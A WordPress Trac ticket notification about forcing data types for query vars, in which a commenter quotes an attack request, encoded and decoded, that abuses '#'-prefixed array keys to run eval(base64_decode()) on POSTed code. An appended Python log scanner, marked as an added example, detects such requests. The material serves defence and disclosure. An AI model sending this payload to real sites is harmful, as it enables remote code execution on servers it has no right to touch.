[wp-trac] [WordPress Trac] #17737: Be better at forcing data types for query vars
WordPress Trac
noreply at wordpress.org
Tue Sep 25 08:54:22 UTC 2018
#17737: Be better at forcing data types for query vars
---------------------------------+-----------------------------
Reporter: juliobox | Owner: SergeyBiryukov
Type: defect (bug) | Status: reviewing
Priority: normal | Milestone: 5.0
Component: Query | Version: 3.0
Severity: normal | Resolution:
Keywords: has-patch 3.9-early | Focuses:
---------------------------------+-----------------------------
Comment (by szepe.viktor):
There are attacks containing a hash sign as the first character of the
query variable array index.
{{{
GET /?name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%24_POST%5B%27test_exec%27%5D%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup HTTP/1.1
}}}
Decoded:
{{{
/?name[#post_render][0]=array_map&name[#suffix]=eval(base64_decode($_POST['test_exec']));//&name[#markup]=assert&name[#type]=markup
}}}
Protection is implemented: https://github.com/szepeviktor/wordpress-fail2ban/blob/master/block-bad-requests/wp-fail2ban-bad-request-instant.inc.php#L396-L402
--
Ticket URL: <https://core.trac.wordpress.org/ticket/17737#comment:33>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
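A log-side check for the request shape described in the comment above, as an added example that is not code from the ticket or from the linked wordpress-fail2ban repository. It decodes PHP-style bracket keys from logged request lines and flags query vars that arrive as arrays where a scalar is expected, and array indexes that begin with `#`. The `SCALAR_VARS` set and the log lines are assumptions constructed for the demo.

```python
import re
from urllib.parse import parse_qsl

# Assumption: vars this demo expects to be scalar. "name" is from the comment
# above; "p" and "page_id" are illustrative picks, not a list from the ticket.
SCALAR_VARS = {"name", "p", "page_id"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
KEY_RE = re.compile(r"^([^\[\]]+)((?:\[[^\]]*\])*)$")  # base, then [k][k]...
SUBKEY_RE = re.compile(r"\[([^\]]*)\]")

# Constructed sample access-log lines (documentation IPs, harmless values).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2018:08:50:01 +0000] "GET /?name=hello-world HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Sep/2018:08:50:02 +0000] "GET /?name%5B%23type%5D=markup&name%5B%23markup%5D=x HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Sep/2018:08:50:03 +0000] "GET /?p%5B%5D=1 HTTP/1.1" 200 5120',
    '203.0.113.8 - - [25/Sep/2018:08:50:04 +0000] "GET /?tag%5B%5D=news HTTP/1.1" 200 5120',
]

def inspect_target(target):
    """Return sorted findings for one request target (path plus query string)."""
    findings = set()
    # Split on the first "?" by hand so a raw, unencoded "#" stays in the query.
    query = target.partition("?")[2]
    for raw_key, _value in parse_qsl(query, keep_blank_values=True):
        m = KEY_RE.match(raw_key)  # raw_key is already percent-decoded
        if not m:
            continue
        base, subkeys = m.group(1), SUBKEY_RE.findall(m.group(2))
        if subkeys and base in SCALAR_VARS:
            findings.add(f"array-for-scalar:{base}")
        for sub in subkeys:
            if sub.startswith("#"):
                findings.add(f"hash-key:{base}[{sub}]")
    return sorted(findings)

def scan_log(lines):
    """Return (client_ip, findings) for every log line with at least one finding."""
    flagged = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            findings = inspect_target(m.group(1))
            if findings:
                flagged.append((line.split(" ", 1)[0], findings))
    return flagged

if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip, findings)
```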